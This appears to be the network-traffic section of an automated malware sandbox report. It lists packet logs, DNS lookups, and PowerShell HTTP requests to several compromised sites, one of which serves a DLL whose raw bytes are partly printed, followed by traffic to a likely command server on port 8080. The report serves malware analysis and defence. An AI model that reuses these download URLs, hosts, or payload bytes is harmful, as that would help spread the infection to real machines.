                                                        Jan 23, 2021 13:39:18.798891068 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798914909 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.798922062 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.798930883 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.798969984 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799005032 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799007893 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799057007 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799077034 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799099922 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799137115 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799176931 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799185991 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799216032 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799232006 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799254894 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799293041 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799333096 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799339056 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799381971 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799401045 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799426079 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799463987 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799504042 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799506903 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799546003 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799581051 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799582958 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799622059 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799660921 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799666882 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799710989 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799732924 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799755096 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799793005 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799828053 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799830914 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799874067 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799902916 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799911022 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799951077 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.799983978 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.799988985 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800038099 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800055981 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800081968 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800120115 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800149918 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800158024 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800195932 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800230980 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800232887 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800271988 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800301075 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800308943 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800359011 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800374985 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800401926 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800438881 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800471067 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800478935 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800515890 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800544024 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800554037 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800591946 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800623894 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800628901 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800676107 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800710917 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800719976 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800757885 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800791979 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800796986 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800836086 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800863028 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800875902 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800914049 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.800939083 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.800951958 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801000118 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801017046 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801043987 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801080942 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801115036 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801116943 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801155090 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801188946 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801192999 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801232100 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801269054 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801269054 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801315069 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801331997 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801357985 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801422119 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801425934 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801464081 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801501989 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801539898 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801557064 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801578999 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801608086 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801618099 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801656008 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801692963 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801702976 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801745892 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801772118 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801784039 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801822901 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801852942 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801861048 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801898956 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801933050 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.801937103 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.801975965 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802005053 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802022934 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802067041 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802089930 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802104950 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802144051 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802171946 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802182913 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802222967 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802253008 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802261114 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802299976 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802326918 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802347898 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802392006 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802417994 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802428961 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802468061 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802500010 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:18.802503109 CET804917145.143.97.183192.168.2.22
                                                        Jan 23, 2021 13:39:18.802571058 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:19.103357077 CET4916580192.168.2.22172.67.138.213
                                                        Jan 23, 2021 13:39:19.103688002 CET4917180192.168.2.2245.143.97.183
                                                        Jan 23, 2021 13:39:19.103693962 CET4916680192.168.2.22166.62.10.32
                                                        Jan 23, 2021 13:39:45.332576036 CET4917280192.168.2.2269.38.130.14
                                                        Jan 23, 2021 13:39:48.347103119 CET4917280192.168.2.2269.38.130.14
                                                        Jan 23, 2021 13:39:57.725693941 CET491738080192.168.2.22195.159.28.230
                                                        Jan 23, 2021 13:39:57.790754080 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:57.790978909 CET491738080192.168.2.22195.159.28.230
                                                        Jan 23, 2021 13:39:57.792049885 CET491738080192.168.2.22195.159.28.230
                                                        Jan 23, 2021 13:39:57.792117119 CET491738080192.168.2.22195.159.28.230
                                                        Jan 23, 2021 13:39:57.856714964 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:57.856784105 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:57.856888056 CET491738080192.168.2.22195.159.28.230
                                                        Jan 23, 2021 13:39:57.921813011 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:57.921863079 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:57.921895027 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:57.921919107 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:58.087609053 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:58.087635994 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:58.087661028 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:39:58.087851048 CET491738080192.168.2.22195.159.28.230
                                                        Jan 23, 2021 13:40:01.084537983 CET808049173195.159.28.230192.168.2.22
                                                        Jan 23, 2021 13:40:01.084954977 CET491738080192.168.2.22195.159.28.230

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 23, 2021 13:39:15.740778923 CET5219753192.168.2.228.8.8.8
                                                        Jan 23, 2021 13:39:15.797823906 CET53521978.8.8.8192.168.2.22
                                                        Jan 23, 2021 13:39:15.946419001 CET5309953192.168.2.228.8.8.8
                                                        Jan 23, 2021 13:39:16.002760887 CET53530998.8.8.8192.168.2.22
                                                        Jan 23, 2021 13:39:16.486589909 CET5283853192.168.2.228.8.8.8
                                                        Jan 23, 2021 13:39:16.542841911 CET53528388.8.8.8192.168.2.22
                                                        Jan 23, 2021 13:39:17.263586998 CET6120053192.168.2.228.8.8.8
                                                        Jan 23, 2021 13:39:17.489320993 CET53612008.8.8.8192.168.2.22
                                                        Jan 23, 2021 13:39:18.166259050 CET4954853192.168.2.228.8.8.8
                                                        Jan 23, 2021 13:39:18.270777941 CET53495488.8.8.8192.168.2.22

                                                        ICMP Packets

                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Jan 23, 2021 13:39:45.490120888 CET69.38.130.14192.168.2.228718(Host unreachable)Destination Unreachable
                                                        Jan 23, 2021 13:39:48.480972052 CET69.38.130.14192.168.2.228718(Host unreachable)Destination Unreachable

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jan 23, 2021 13:39:15.740778923 CET192.168.2.228.8.8.80x62a5Standard query (0)coworkingplus.esA (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:15.946419001 CET192.168.2.228.8.8.80x523fStandard query (0)silkonbusiness.matrixinfotechsolution.comA (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:16.486589909 CET192.168.2.228.8.8.80x51f2Standard query (0)bbjugueteria.comA (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:17.263586998 CET192.168.2.228.8.8.80xc52cStandard query (0)www.bimception.comA (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:18.166259050 CET192.168.2.228.8.8.80x70c0Standard query (0)armakonarms.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jan 23, 2021 13:39:15.797823906 CET8.8.8.8192.168.2.220x62a5No error (0)coworkingplus.es172.67.138.213A (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:15.797823906 CET8.8.8.8192.168.2.220x62a5No error (0)coworkingplus.es104.21.89.78A (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:16.002760887 CET8.8.8.8192.168.2.220x523fNo error (0)silkonbusiness.matrixinfotechsolution.com166.62.10.32A (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:16.542841911 CET8.8.8.8192.168.2.220x51f2No error (0)bbjugueteria.com162.241.60.240A (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:17.489320993 CET8.8.8.8192.168.2.220xc52cNo error (0)www.bimception.combimception.comCNAME (Canonical name)IN (0x0001)
                                                        Jan 23, 2021 13:39:17.489320993 CET8.8.8.8192.168.2.220xc52cNo error (0)bimception.com162.241.224.176A (IP address)IN (0x0001)
                                                        Jan 23, 2021 13:39:18.270777941 CET8.8.8.8192.168.2.220x70c0No error (0)armakonarms.com45.143.97.183A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • coworkingplus.es
                                                        • silkonbusiness.matrixinfotechsolution.com
                                                        • armakonarms.com
                                                        • 195.159.28.230
                                                          • 195.159.28.230:8080

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.2249165172.67.138.21380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 23, 2021 13:39:15.865818024 CET0OUTGET /wp-admin/FxmME/ HTTP/1.1
                                                        Host: coworkingplus.es
                                                        Connection: Keep-Alive
                                                        Jan 23, 2021 13:39:15.927921057 CET1INHTTP/1.1 200 OK
                                                        Date: Sat, 23 Jan 2021 12:39:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Set-Cookie: __cfduid=d52c1df72727789a7628c33ec8c1558c91611405555; expires=Mon, 22-Feb-21 12:39:15 GMT; path=/; domain=.coworkingplus.es; HttpOnly; SameSite=Lax
                                                        X-Frame-Options: SAMEORIGIN
                                                        cf-request-id: 07d0da90c00000faa09d96e000000001
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=C2ABkD9lLMK99wh%2BXGX0jORMD8bQgmSrOUhfFA7zh7QVDEdy4i25jSFQTQiwZt%2BY7gUV0vRwNLISX6H4vqWoPV3YIIGC4NayPGmAEiXlktSK"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 61619394682ffaa0-AMS
                                                        Data Raw: 31 30 64 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64
                                                        Data Ascii: 10d8<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=d
                                                        Jan 23, 2021 13:39:15.927983046 CET3INData Raw: 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63
                                                        Data Ascii: evice-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.
                                                        Jan 23, 2021 13:39:15.928020954 CET4INData Raw: 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 6c 69 6e 6b 20
                                                        Data Ascii: ass="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy
                                                        Jan 23, 2021 13:39:15.928057909 CET5INData Raw: 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63 66 2d 77 72 61 70 70
                                                        Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class=
                                                        Jan 23, 2021 13:39:15.928085089 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.2249166166.62.10.3280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 23, 2021 13:39:16.221730947 CET6OUTGET /js/q26/ HTTP/1.1
                                                        Host: silkonbusiness.matrixinfotechsolution.com
                                                        Connection: Keep-Alive
                                                        Jan 23, 2021 13:39:16.458409071 CET7INHTTP/1.1 404 Not Found
                                                        Date: Sat, 23 Jan 2021 12:39:16 GMT
                                                        Server: Apache
                                                        Content-Length: 315
                                                        Keep-Alive: timeout=5
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.224917145.143.97.18380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jan 23, 2021 13:39:18.345472097 CET10OUTGET /wp-includes/fz/ HTTP/1.1
                                                        Host: armakonarms.com
                                                        Connection: Keep-Alive
                                                        Jan 23, 2021 13:39:18.424928904 CET12INHTTP/1.1 200 OK
                                                        Connection: Keep-Alive
                                                        X-Powered-By: PHP/7.3.22
                                                        Set-Cookie: 600c18f66174c=1611405558; expires=Sat, 23-Jan-2021 12:40:18 GMT; Max-Age=60; path=/
                                                        Cache-Control: no-cache, must-revalidate
                                                        Pragma: no-cache
                                                        Last-Modified: Sat, 23 Jan 2021 12:39:18 GMT
                                                        Expires: Sat, 23 Jan 2021 12:39:18 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Disposition: attachment; filename="IhxqjcZUweKwhoG4YOy.dll"
                                                        Content-Transfer-Encoding: binary
                                                        Transfer-Encoding: chunked
                                                        Date: Sat, 23 Jan 2021 12:39:18 GMT
                                                        Server: LiteSpeed
                                                        Data Raw: 31 30 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 86 46 0b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 fa 04 00 00 00 00 00 50 19 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 18 c6 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 05 00 58 15 00 00 00 a0 05 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 36 00 